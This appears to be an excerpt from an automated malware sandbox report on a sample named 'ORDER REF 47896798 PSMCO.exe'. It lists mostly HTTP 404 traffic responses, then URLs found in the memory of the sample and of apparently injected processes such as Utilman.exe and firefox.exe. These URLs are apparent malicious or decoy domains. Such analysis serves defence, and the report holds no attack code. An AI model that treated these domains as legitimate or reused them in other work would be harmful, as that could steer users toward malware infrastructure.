                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:52 GMTContent-Type: text/htmlContent-Length: 548Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:54 GMTContent-Type: text/htmlContent-Length: 548Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:57 GMTContent-Type: text/htmlContent-Length: 548Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:59 GMTContent-Type: text/htmlContent-Length: 548Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:06 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:09 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:09 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:09 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:00:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaU4ivDhT3Zk%2F51rHf1hPzSr4Fak1GDP482%2BlcL63VV8jGbPRNV6RNT%2BcDUzDQSD%2F9jAxGByox3KXcVHsRaltKQ3bTQgyHvD4ZU5YoHTdxYGxfD92mHkYcT5HTg4ucjsFsT%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fecb6945e944352-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:00:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcRaYP8bJSkzgoPI9TPBNaZcrk9W%2FZKNpXuxNTWl61TLdRYaAlytSwhXAF4Z1UGZ4AQoS14pJwZ7j14t735VNo3AYRSHq1gVrGN3mM2JlWx1XkIQzkySW3BdENsnuAHJrEUv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fecb6a4dd968c36-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:00:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dA%2FAZWuktk9Vvgk7sfckn0q1xxlnfdMsRdX%2FMLqDbMeTMoHkMWImAW%2BD7VL2vAW6Je6m8uEgq0yWxmWQ%2Bi%2FcZ8aF9yiQ7%2BXyiIfxGytkl%2FNBIxacab83Px%2B8U%2B30GraM9wxK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fecb6b4cb400f68-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1481&rtt_var=740&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:00:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jUdTiXa%2FTlIMs2OPDEwD2jTHEdmRyAzvYleTLMiJLtrQ6vv9ud41Kefx9QaFLyoSDH2nlHcKsLEPEP9SbUwFckmuFYWdYP9%2BEo82neC9Sr2ZRUqp7aefTiKYOMahMmu6qzI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fecb6c4ae8f4408-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=513&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:01:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a eb 6f db d6 15 ff 9e bf e2 46 03 2c 29 11 c9 ba 1d 8a 24 96 e4 b5 4d f7 a9 8f 01 4e 37 0c ae 2b 5c 51 57 12 23 8a d4 48 ca 8e 92 18 68 93 76 6d d1 a0 c1 ba 02 03 8a 15 7b 61 d8 a7 01 ce c3 ab 9b 87 fb 2f 90 ff d1 7e e7 5c 92 a2 64 49 79 34 1d 66 c0 b6 74 79 ef b9 e7 f9 3b e7 dc cb fa e9 8e 6f 47 93 91 12 fd 68 e8 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 47 91 b3 ab 4a c2 95 5e af 51 0a c6 25 cc 51 b2 d3 ac 0f 55 24 85 dd 97 41 a8 a2 46 e9 bd 4b bf 34 ce e1 19 8f 7a 72 a8 1a a5 91 0c 06 8e d7 2b 09 db f7 22 e5 61 52 a0 7a c1 d8 08 40 73 76 e6 ae a3 f6 46 7e 10 15 a6 ee 39 9d a8 df e8 a8 5d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 0e 12 91 13 b9 aa b9 b7 b7 67 0e fd d0 0f 54 df 95 6d 57 99 be e7 3a 9e aa 5b fa 71 1d 5f 06 22 50 6e a3 14 46 13 57 85 7d a5 b0 d3 50 75 1c d9 28 49 d7 2d 89 7e a0 ba 39 bf cc 9f 21 c7 91 6f da 61 88 5d a6 eb 1d 48 92 cd ee 4a b0 e6 7b 26 fe 6c ae 97 04 a9 10 1a 1b ca 9e b2 ae 18 3c b1 59 0f ed c0 19 45 4d eb 4c fd f4 f6 1b 17 5f bb f4 da f6 19 eb d4 9e e3 75 fc 3d 33 0a a4 3d d8 e2 09 6f f9 b2 23 1a a2 3b f6 ec c8 f1 bd 4a f5 da fe c6 29 eb cc ce 4e f3 8c 55 b7 52 22 29 31 01 e1 30 bd 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 7c 15 04 7e f0 94 0b 6a 62 1d 6b c2 c0 6e 94 8a 84 60 98 cc d0 e3 a8 cb 86 7e 66 be c8 6b 60 3b d2 48 f8 d4 bc cd 2f 2a f2 37 f7 6c 15 8f 96 76 d9 b6 df 99 64 ce dd 36 46 b0 95 d0 ff 5a 64 be 56 ea b0 3c c6 ae 3b fd d4 6a f7 5a ae d3 eb 47 f0 07 a2 a5 82 22 1d 9e dc 6a a5 0f 88 e4 cc 88 a6 9e ba 7d c7 d9 5d ba d4 f0 fc 88 58 8a d4 15 6c 14 7f 1d 1f c7 8f e2 c3 f8 b1 88 bf 8b 0f 92 0f f1 f1 5e 7c 94 7c 94 dc c0 e7 23 fc 1e c7 77 e3 03 7a 7c 77 cd 6b 87 a3 8d 3a 02 52 87 6e db 20 af cd 7c b5 1f 45 a3 f0 82 65 21 fe 4c 
44 b0 0e 06 cf ef fa ae eb ef 09 cf f7 47 0a 5e 82 0f 88 03 78 8b 0a e0 cf 32 e8 51 5c b7 da 08 fc 01 98 f9 2b ed 6e 26 1f 26 37 eb 96 6c d6 2d c8 d1 ac cf 09 d3 53 ad 56 1a ec c6 5e 20 47 23 10 4d 15 3c 3f de e2 58 6c 21 16 80 0c 4b 27 b1 59 fa 7e 18 01 47 8c 30 92 91 63 c3 00 73 bb ce e8 da 48 f7 27 3b ad 4f b5 31 67 11 83 a1 a1 b4 1c 3a fa eb cd fa 68 f9 f2 8e d2 8e 8c 68 7d 76 73 d5 db 41 33 3e d2 16 8b 7f 20 53 c6 3f b0 79 1f 9c 30 e8 8c d6 47 cb 24 6f 8f a3 c8 f7 c2 4c e5 10 bd e0 07 fa 21 b8 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 e4 6d e9 83 d0 b9 aa 5a 70 81 a1 74 d9 1e a9 5a f3 f5 b9 0a d3 f9 6c 1b 20 73 81 c4 48 76 3a b0 54 cb 25 e7 99 77 3e 82 69 ed 80 d6 5e df 77 42 6b d3 ee 2b 7b d0 58 eb 70 ba 58 82 e2 6b 72 38 da c0 b2 56 e8 8f 03 5b 35 32 2e 08 9f 4b cd df 10 21 f2 47 51 14 99 c2 a7 28 02 03 78 21 2a 57 8b d4 f1 87 d2 c9 61 3e 0b 9d 02 f7 7a 82 e5 a9 3d 6b 73 1c 0d 33 ce 96 09 40 53 28 d9 8c 87 19 f3 6b 34 64 43 30 e9 f4 bc 46 08 75 79 9d 16 c8 ad 96 35 fe 3b dc e3 3f f1 a1 48 3e 89 8f 93 4f 93 9b 22 be 9f 01 c4 e9 42 4c 86 23 e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:01:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a eb 6f db d6 15 ff 9e bf e2 46 03 2c 29 11 c9 ba 1d 8a 24 96 e4 b5 4d f7 a9 8f 01 4e 37 0c ae 2b 5c 51 57 12 23 8a d4 48 ca 8e 92 18 68 93 76 6d d1 a0 c1 ba 02 03 8a 15 7b 61 d8 a7 01 ce c3 ab 9b 87 fb 2f 90 ff d1 7e e7 5c 92 a2 64 49 79 34 1d 66 c0 b6 74 79 ef b9 e7 f9 3b e7 dc cb fa e9 8e 6f 47 93 91 12 fd 68 e8 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 47 91 b3 ab 4a c2 95 5e af 51 0a c6 25 cc 51 b2 d3 ac 0f 55 24 85 dd 97 41 a8 a2 46 e9 bd 4b bf 34 ce e1 19 8f 7a 72 a8 1a a5 91 0c 06 8e d7 2b 09 db f7 22 e5 61 52 a0 7a c1 d8 08 40 73 76 e6 ae a3 f6 46 7e 10 15 a6 ee 39 9d a8 df e8 a8 5d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 0e 12 91 13 b9 aa b9 b7 b7 67 0e fd d0 0f 54 df 95 6d 57 99 be e7 3a 9e aa 5b fa 71 1d 5f 06 22 50 6e a3 14 46 13 57 85 7d a5 b0 d3 50 75 1c d9 28 49 d7 2d 89 7e a0 ba 39 bf cc 9f 21 c7 91 6f da 61 88 5d a6 eb 1d 48 92 cd ee 4a b0 e6 7b 26 fe 6c ae 97 04 a9 10 1a 1b ca 9e b2 ae 18 3c b1 59 0f ed c0 19 45 4d eb 4c fd f4 f6 1b 17 5f bb f4 da f6 19 eb d4 9e e3 75 fc 3d 33 0a a4 3d d8 e2 09 6f f9 b2 23 1a a2 3b f6 ec c8 f1 bd 4a f5 da fe c6 29 eb cc ce 4e f3 8c 55 b7 52 22 29 31 01 e1 30 bd 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 7c 15 04 7e f0 94 0b 6a 62 1d 6b c2 c0 6e 94 8a 84 60 98 cc d0 e3 a8 cb 86 7e 66 be c8 6b 60 3b d2 48 f8 d4 bc cd 2f 2a f2 37 f7 6c 15 8f 96 76 d9 b6 df 99 64 ce dd 36 46 b0 95 d0 ff 5a 64 be 56 ea b0 3c c6 ae 3b fd d4 6a f7 5a ae d3 eb 47 f0 07 a2 a5 82 22 1d 9e dc 6a a5 0f 88 e4 cc 88 a6 9e ba 7d c7 d9 5d ba d4 f0 fc 88 58 8a d4 15 6c 14 7f 1d 1f c7 8f e2 c3 f8 b1 88 bf 8b 0f 92 0f f1 f1 5e 7c 94 7c 94 dc c0 e7 23 fc 1e c7 77 e3 03 7a 7c 77 cd 6b 87 a3 8d 3a 02 52 87 6e db 20 af cd 7c b5 1f 45 a3 f0 82 65 21 fe 4c 
44 b0 0e 06 cf ef fa ae eb ef 09 cf f7 47 0a 5e 82 0f 88 03 78 8b 0a e0 cf 32 e8 51 5c b7 da 08 fc 01 98 f9 2b ed 6e 26 1f 26 37 eb 96 6c d6 2d c8 d1 ac cf 09 d3 53 ad 56 1a ec c6 5e 20 47 23 10 4d 15 3c 3f de e2 58 6c 21 16 80 0c 4b 27 b1 59 fa 7e 18 01 47 8c 30 92 91 63 c3 00 73 bb ce e8 da 48 f7 27 3b ad 4f b5 31 67 11 83 a1 a1 b4 1c 3a fa eb cd fa 68 f9 f2 8e d2 8e 8c 68 7d 76 73 d5 db 41 33 3e d2 16 8b 7f 20 53 c6 3f b0 79 1f 9c 30 e8 8c d6 47 cb 24 6f 8f a3 c8 f7 c2 4c e5 10 bd e0 07 fa 21 b8 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 e4 6d e9 83 d0 b9 aa 5a 70 81 a1 74 d9 1e a9 5a f3 f5 b9 0a d3 f9 6c 1b 20 73 81 c4 48 76 3a b0 54 cb 25 e7 99 77 3e 82 69 ed 80 d6 5e df 77 42 6b d3 ee 2b 7b d0 58 eb 70 ba 58 82 e2 6b 72 38 da c0 b2 56 e8 8f 03 5b 35 32 2e 08 9f 4b cd df 10 21 f2 47 51 14 99 c2 a7 28 02 03 78 21 2a 57 8b d4 f1 87 d2 c9 61 3e 0b 9d 02 f7 7a 82 e5 a9 3d 6b 73 1c 0d 33 ce 96 09 40 53 28 d9 8c 87 19 f3 6b 34 64 43 30 e9 f4 bc 46 08 75 79 9d 16 c8 ad 96 35 fe 3b dc e3 3f f1 a1 48 3e 89 8f 93 4f 93 9b 22 be 9f 01 c4 e9 42 4c 86 23 e
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:01:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:01:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:01:17 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:01:19 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:01:22 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:01:24 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:01:59 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:02:01 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:02:04 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 14:02:07 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:02:56 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:02:59 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:03:01 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:03:01 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 14:03:04 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2121105740.00000000030F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: ORDER REF 47896798 PSMCO.exe String found in binary or memory: http://tempuri.org/WarehouseDataDataSet.xsdYhttp://tempuri.org/WarehouseDataDataSet1.xsdEkursachForA
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.heniaozhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.herobaby.net/binding
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.huayuzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.irishclub.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jianhuozhibo.net/binding
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jiujiuzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.juyouzhibo.net
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kanbzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kanniuzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kejiezhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.keramo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kutus.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kuyingzhibo.net
